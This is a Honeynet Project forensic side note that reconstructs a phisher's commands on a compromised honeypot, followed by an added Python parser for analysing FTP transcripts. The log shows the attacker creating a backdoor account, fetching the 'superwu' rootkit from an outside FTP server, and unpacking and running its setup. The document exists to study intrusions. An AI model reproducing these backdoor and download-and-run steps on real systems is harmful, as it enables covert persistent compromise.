Honeynet Project
http://www.honeynet.org
Last Modified: 14th May 2005
This side note shows the commands issued by the phisher from the attacker's perspective. Their actions were reconstructed from the log files generated by Snort and other logged data. The first part of this side note shows a screenshot of the rootkit's installation process, with a very "user-friendly" interface allowing easy setup. The second part shows the commands issued by the attacker once the rootkit was installed, again reconstructed from the Snort log files.
/usr/sbin/adduser ro
passwd ro
0030934040877
0030934040877
Changing password for user ro
passwd: all authentication tokens updated successfully
ftp -v 204.92.xxx.xxx
Connected to 204.92.xxx.xxx.
220 Ftp server ready.
choose
Name (204.92.xxx.xxx:root):
331 User choose okay, need password.
a
530 Login incorrect.
bye
Remote system type is UNIX.
Using binary mode to transfer files.
221 Goodbye.
ftp -v 204.92.xxx.xxx
Connected to 204.92.xxx.xxx.
220 Ftp server ready.
example
Name (204.92.xxx.xxx:root):
331 User example okay, need password.
choose
230-You are user #14 of 350 simultaneous users allowed.
230-
230 Restricted user logged in.
hash
pass
deb
bin
Remote system type is UNIX.
Using binary mode to transfer files.
Hash mark printing on (1024 bytes/hash mark).
Passive mode off.
Debugging on (debug=1).
---> TYPE I
200 Type okay.
cd cgi-bin
---> CWD cgi-bin
250 "/cgi-bin" is new cwd.
cd rootkyt
---> CWD rootkyt
ls
250 "/cgi-bin/rootkyt" is new cwd.
---> TYPE A
200 Type okay.
---> PORT 212,44,161,115,9,136
200 PORT command successful.
---> LIST
150 Opening ASCII mode data connection for /bin/ls.
-rw-r--r-- 1 ftpuser web 21194156 Sep 6 06:41 list.txt.txt
-rw-r--r-- 1 ftpuser web 723128 Jun 21 15:01 superwu.tgz
226 Listing completed.
cd ..
---> CWD ..
250 "/cgi-bin" is new cwd.
ls
---> PORT 212,44,161,115,9,137
200 PORT command successful.
---> LIST
150 Opening ASCII mode data connection for /bin/ls.
-rw-r--r-- 1 ftpuser web 4107318 Feb 22 2004 SS.tgz
-rw-r--r-- 1 ftpuser web 55271 Aug 6 08:02 Bank.zip
-rw-r--r-- 1 ftpuser web 0 Sep 24 16:10 aw.tgz
-rw-r--r-- 1 ftpuser web 1528 May 25 2004 email.tgz
-rw-r--r-- 1 ftpuser web 0 Sep 26 11:08 limba1.tgz
-rw-r--r-- 1 ftpuser web 52250 Aug 9 15:20 limbos.tgz
-rw-r--r-- 1 ftpuser web 50177 May 23 2004 muie.tgz
-rw-r--r-- 1 ftpuser web 0 Sep 26 09:01 new2.tgz
drwxr-xr-x 2 ftpuser web 512 Sep 14 11:34 website
-rw-r--r-- 1 ftpuser web 102240 Jun 4 16:46 website.tar.gz
-rw-r--r-- 1 ftpuser web 102223 Jun 4 16:45 website.tgz
-rwxr-xr-x 1 ftpuser web 3350063 Jul 9 17:39 php
-rw-r--r-- 1 ftpuser web 0 Sep 30 15:07 pulamea.tgz
drwxr-xr-x 2 ftpuser web 512 Sep 6 06:29 rootkyt
-rw-r--r-- 1 ftpuser web 50200 May 23 2004 sa-va-dau-la-muie.tgz
-rw-r--r-- 1 ftpuser web 1960 Aug 3 06:24 send.tgz
-rw-r--r-- 1 ftpuser web 2086 Sep 22 15:04 sendspam.tgz
-rw-r--r-- 1 ftpuser web 0 Oct 3 08:09 spam.tar.gz
-rw-r--r-- 1 ftpuser web 52236 Aug 3 06:12 spam1.tgz
-rw-r--r-- 1 ftpuser web 50176 Sep 22 14:29 spamul.tgz
-rw-r--r-- 1 ftpuser web 2758 May 26 2004 trimite.zip
226 Listing completed.
cd ..
---> CWD ..
ls
250 "/" is new cwd.
---> PORT 212,44,161,115,9,138
200 PORT command successful.
---> LIST
150 Opening ASCII mode data connection for /bin/ls.
drwxr-x--- 5 ftpuser web 512 Oct 25 10:59 cgi-bin
drwxr-x--- 4 ftpuser web 1024 Nov 14 17:21 www
226 Listing completed.
cd www
---> CWD www
ls
250 "/www" is new cwd.
---> PORT 212,44,161,115,9,139
200 PORT command successful.
---> LIST
150 Opening ASCII mode data connection for /bin/ls.
-rw-r--r-- 1 ftpuser web 13996 Apr 22 2004 asp.tgz
-rw-r----- 1 ftpuser web 695 Jan 21 2003 index.htm
-rw-r--r-- 1 ftpuser web 82211 Oct 20 2003 local.tgz
-rw-r--r-- 1 ftpuser web 37910 Sep 16 2003 mass2.tar.gz
drwxr-xr-x 2 ftpuser web 512 Aug 20 14:00 muie
-rw-r--r-- 1 ftpuser web 12755 Jun 6 2003 pizda.tgz
-rw-r--r-- 1 ftpuser web 130892 Jun 5 2003 screen.tgz
-rw-r--r-- 1 ftpuser web 0 Nov 11 10:39 spam-asp.tgz
-rw-r--r-- 1 ftpuser web 10332 Aug 11 2003 sslstop.tar.gz
-rw-r--r-- 1 ftpuser web 31965 Oct 20 2003 strobe.tgz
drwxr-xr-x 2 ftpuser web 512 Aug 20 14:00 superwu.tgz
226 Listing completed.
cd ..
---> CWD ..
250 "/" is new cwd.
cd cgi-bin
---> CWD cgi-bin
250 "/cgi-bin" is new cwd.
cd rootkyt
---> CWD rootkyt
250 "/cgi-bin/rootkyt" is new cwd.
get superwu.tgz
local: superwu.tgz remote: superwu.tgz
---> TYPE I
200 Type okay.
---> PORT 212,44,161,115,9,140
200 PORT command successful.
---> RETR superwu.tgz
150 Opening BINARY mode data connection for superwu.tgz (723128 bytes).
##################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################
226 Transfer completed.
bye
723128 bytes received in 96.7 secs (7.3 Kbytes/sec)
---> QUIT
221 Goodbye.
tar xzvf superwu.tgz
.nr/
.nr/createdir
.nr/firewall
.nr/status
.nr/clean
.nr/mailme
.nr/patch
.nr/remove
.nr/replace
.nr/startfile
.nr/init
.nr/sendmail/
.nr/sendmail/sshd_config
.nr/sendmail/ssh_host_key
.nr/sendmail/ssh_random_seed
.nr/sendmail/sendmail
.nr/chattr
.nr/dir
.nr/du
.nr/encrypt
.nr/fix
.nr/ifconfig
.nr/killall
.nr/libproc.so.2.0.6
.nr/login
.nr/ls
.nr/lsof
.nr/md5sum
.nr/netstat
.nr/ps
.nr/pstree
.nr/socklist/
.nr/socklist/Xf/
.nr/socklist/Xf/fix.c
.nr/socklist/Xf/fix
.nr/socklist/Xf/chattr
.nr/socklist/Xf/socklistx.c
.nr/socklist/Xf/socklistx
.nr/socklist/Xf/move
.nr/socklist/Xf/stringsx.c
.nr/socklist/Xf/stringsx
.nr/socklist/socklist
.nr/socklist/utils/
.nr/socklist/utils/.siz.c
.nr/socklist/utils/siz
.nr/top
.nr/vdir
.nr/lg
.nr/.c
.nr/.d
.nr/.p
.nr/write
.nr/read
.nr/cl
.nr/curatare/
.nr/curatare/ps
.nr/curatare/pstree
.nr/curatare/sshd
.nr/curatare/clean
.nr/curatare/chattr
.nr/curatare/attrib
setup
./setup
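As an added example (not part of the Honeynet write-up), a small parser that walks a client-side ftp transcript like the one reconstructed above and pulls out what an analyst wants from it: which logins failed or succeeded, where each active-mode PORT data channel pointed (the attacker's own host and port), and which files were retrieved and how large they were. The embedded excerpt is constructed from lines of the session above; the function names are ours.

```python
import re

# Constructed excerpt modelled on the reconstructed session above (the IP
# and file names follow the page, the choice of lines is ours).
SESSION = """\
331 User choose okay, need password.
530 Login incorrect.
331 User example okay, need password.
230 Restricted user logged in.
---> CWD cgi-bin
250 "/cgi-bin" is new cwd.
---> CWD rootkyt
250 "/cgi-bin/rootkyt" is new cwd.
---> PORT 212,44,161,115,9,140
200 PORT command successful.
---> RETR superwu.tgz
150 Opening BINARY mode data connection for superwu.tgz (723128 bytes).
226 Transfer completed.
"""

def decode_port(arg):
    """Turn an FTP PORT argument h1,h2,h3,h4,p1,p2 into (ip, port)."""
    h1, h2, h3, h4, p1, p2 = (int(x) for x in arg.split(","))
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2

def summarize_session(text):
    """Walk an ftp transcript and report logins, data-channel endpoints
    and retrieved files (remote path resolved against the tracked cwd)."""
    out = {"failed": [], "success": [], "data_endpoints": [], "transfers": []}
    user, cwd, pending = None, "/", None
    for line in text.splitlines():
        m = re.match(r"331 User (\S+) okay", line)
        if m:
            user = m.group(1)                      # USER accepted, PASS pending
        elif line.startswith("530"):
            out["failed"].append(user)             # bad password for that user
        elif line.startswith("230 "):
            out["success"].append(user)            # final 230 = logged in
        elif (m := re.match(r'250 "(.+)" is new cwd', line)):
            cwd = m.group(1)                       # server-confirmed directory
        elif line.startswith("---> PORT "):
            out["data_endpoints"].append(decode_port(line.split()[2]))
        elif line.startswith("---> RETR "):
            pending = line.split(maxsplit=2)[2]    # name of file being fetched
        elif (m := re.search(r"\((\d+) bytes\)", line)) and pending:
            out["transfers"].append((cwd.rstrip("/") + "/" + pending, int(m.group(1))))
            pending = None
    return out
```

The PORT decode is the detail worth remembering: in active mode the client names the address the server must connect back to, so the transcript records the attacker's side of the data channel as well as the server's.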